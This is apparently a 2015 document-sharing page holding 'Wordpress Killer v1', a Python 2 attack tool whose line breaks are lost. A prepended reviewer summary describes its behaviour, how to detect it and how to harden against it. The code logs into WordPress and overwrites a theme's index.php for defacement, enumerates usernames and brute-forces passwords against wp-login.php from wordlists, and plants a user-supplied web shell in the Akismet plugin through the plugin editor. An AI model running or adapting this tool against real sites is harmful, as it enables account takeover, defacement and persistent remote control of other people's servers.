wordpress killer v1 [ python ]


Upload: unduh-bahan

Post on 01-Dec-2015


Category:

Documents



DESCRIPTION

Pela Jar and Arik on Tess Eo

TRANSCRIPT

# Reviewer summary (a defender's reading of the listing below).
#
# Form: Python 2 source (print statements, raw_input, urllib2, cookielib) whose
# line breaks and indentation were lost in extraction; the leading run of digits
# is the document viewer's line-number gutter. Loop nesting cannot be recovered
# with certainty, so the code is left exactly as extracted.
#
# Visible behaviour, per menu entry:
#   [1] changeindex        - POSTs the supplied log/pwd to /wp-login.php, opens
#                            /wp-admin/theme-editor.php, reads the _wpnonce
#                            field and sends an action=update form whose
#                            newcontent is a local file, aimed at a theme's
#                            index.php.
#   [2] BruteForceUsername - POSTs each wordlist entry as `log` with one fixed
#                            password and searches the reply for "The password
#                            you entered for the username" / "Incorrect
#                            password"; it depends on the login form answering
#                            differently for accounts that exist.
#   [3] BruteforcePassWord - POSTs each candidate as `pwd` for a single user and
#                            treats any reply without "ERROR" as a hit.
#   [4] UpLoadShell        - same login, then prepares an action=update form for
#                            akismet/akismet.php via /wp-admin/plugin-editor.php
#                            and requests /wp-content/plugins/akismet/akismet.php.
# Every URL is built with "http://", so the credentials travel in clear text.
#
# Detection:
#   - many POSTs to /wp-login.php from one client in which only `log` or only
#     `pwd` changes. The code sets no User-Agent, so urllib2's default
#     "Python-urllib/<version>" is presumably sent (trivial to change, so treat
#     it as a weak signal only).
#   - POSTs to /wp-admin/theme-editor.php or /wp-admin/plugin-editor.php carrying
#     action=update, and unexpected changes on disk to a theme's index.php or to
#     plugins/akismet/akismet.php (file-integrity monitoring on wp-content).
#
# Hardening:
#   - define('DISALLOW_FILE_EDIT', true); in wp-config.php switches the built-in
#     theme and plugin editors off, removing the write path used by [1] and [4].
#   - throttle or lock out repeated login failures, require a second factor for
#     administrator accounts, and return the same login error for an unknown
#     user and a wrong password so [2] gets no signal.
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184#!/usr/bin/env python# -*- coding: utf-8 -*-import urllib, urllib2, cookielib, re , sys , os if os.name == 'nt': os.system('cls') # Windowselse: os.system('clear') # Linuxdef welcome(): print''' |====================================| |========= [ FoX HaCkEr ] ==========| |====== [ [email protected] ] =========| |=====[ http://www.sec4ever.com ]====| |====================================| | Wordpress Killer v1 | |====================================| ''' print "[1] Change Index\n" print "[2] BruteForce UserName\n" print "[3] BruteForce PassWord\n" print "[4] UploaD Shell \n" def changeindex(): try: site = raw_input("EnTer site : ") username = raw_input("UserName : ") password = raw_input("Password : ") pathindex = raw_input("Path index :") index = open(pathindex,'r').read() sec4ever = cookielib.CookieJar() fox = urllib2.build_opener(urllib2.HTTPCookieProcessor(sec4ever)) login_data = urllib.urlencode({'log':username,'pwd':password,'rememberme':'forever','wp-submit':'1'}) fox.open('http://'+site+'/wp-login.php', login_data) mkq = fox.open('http://'+site+'/wp-admin/theme-editor.php', login_data).read().replace('&','&').replace('%2F','/') find = re.findall('',mkq) for i in range(len(find)): fox1 = find[i] find2 = re.findall('index.php&(.*?)">',mkq) for b in range(len(find2)): fox2 = find2[b] sec = fox1.split('/') theme = '/wp-admin/theme-editor.php?file=/themes/'+sec[2]+'/index.php&'+fox2 session = "http://"+site+"/wp-admin/theme-editor.php?file=/themes/"+sec[2] +"/index.php&"+ fox2 opsession = fox.open(session).read() wordpress = 
re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',opsession) for wp2 in range(len(wordpress)): var = wordpress[wp2] lpop = urllib.urlencode({'_wpnonce':var,'_wp_http_referer':theme,'newcontent':index,'action':'update','scrollto':'0','submit':'1'}) press = fox.open(session, lpop).read() findindexhello = re.search(index, press) if findindexhello: print "Site Is Hacked ....\n" else: print "Error\n" except IOError: print "Error\n" def BruteForceUsername(): a = raw_input("InTer Site Here : ") lists = raw_input("wordlist :") file_user = open(lists).readlines() for i in range(len(file_user)): coms = file_user[i].replace('\n','') try: # The password you entered for the username admin urls = urllib2.Request('http://'+a+'/wp-login.php') enco = urllib.urlencode({'log':coms,'pwd':'123123123','wp-submit':'1'}) inpu = urllib2.urlopen(urls, enco) data = inpu.read() find_u = re.findall("The password you entered for the username "+str(coms)+"",data) or re.findall("Incorrect password",data) if find_u: print "User is : "+coms elif not find_u: print "[-] Not FounD" except IOError: pass def BruteforcePassWord(): rae = raw_input("Enter Site here : ") user = raw_input("Enter UserName : ") passs = raw_input("PassLisT : ") opens = open(passs,'r') for z in opens.readlines(): sss = (z.rstrip()) data = { 'log' : user , 'pwd' : sss } request = urllib2.Request('http://'+rae+'/wp-login.php') request.add_data(urllib.urlencode(data)) page = urllib2.urlopen(request) if re.search("ERROR",page.read()): print "[-] NoT FounD : " +sss else: print "[+] FounD PassWord : "+sss break def UpLoadShell(): try: site5 = raw_input("EnTer site : ") username5 = raw_input("UserName : ") password5 = raw_input("Password : ") pathshell = raw_input("Path your shell in your pc : ") shell = open(pathshell,'r').read() sec4ever5 = cookielib.CookieJar() fox5 = urllib2.build_opener(urllib2.HTTPCookieProcessor(sec4ever5)) login_data5 = 
urllib.urlencode({'log':username5,'pwd':password5,'rememberme':'forever','wp-submit':'1'}) fox5.open('http://'+site5+'/wp-login.php', login_data5) mkq5 = fox5.open('http://'+site5+'/wp-admin/plugin-editor.php', login_data5).read().replace('&','&').replace('%2F','/') find5 = re.findall('',mkq5) for a in range(len(find5)): fox4 = find5[a] find2 = re.findall('akismet.php&(.*?)">',mkq5) for b in range(len(find2)): fox2 = find2[b] sec = fox4.split('/') theme = '/wp-admin/plugin-editor.php?file=/akismet/akismet.php&' session = "http://"+site5+"/wp-admin/plugin-editor.php?file=/akismet/akismet.php&" opsession = fox5.open(session).read() wordpress = re.findall('id="_wpnonce" name="_wpnonce" value="(.*?)"',opsession) for wp3 in range(len(wordpress)): var3 = wordpress[wp3] lpop3 = urllib.urlencode({'_wpnonce':var3,'_wp_http_referer':theme,'newcontent':shell,'action':'update','scrollto':'0','submit':'1'}) ope = urllib2.urlopen('http://'+site5+'/wp-content/plugins/akismet/akismet.php').read() if re.search('home',ope): print "\nDone Go To This PATH [+]--> "+site5+"/wp-content/plugins/akismet/akismet.php\n" else: print "Error\n" except IOError: print " Error\n" # print welcome()killer = raw_input("Inter Number : ") if killer == '1': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print changeindex() sys.exit(1)elif killer == '2': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print BruteForceUsername() sys.exit(1) elif killer == '3': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print BruteforcePassWord() sys.exit(1) elif killer == '4': if os.name == 'nt': os.system('cls') # Windows else: os.system('clear') # Linux print UpLoadShell() sys.exit(1)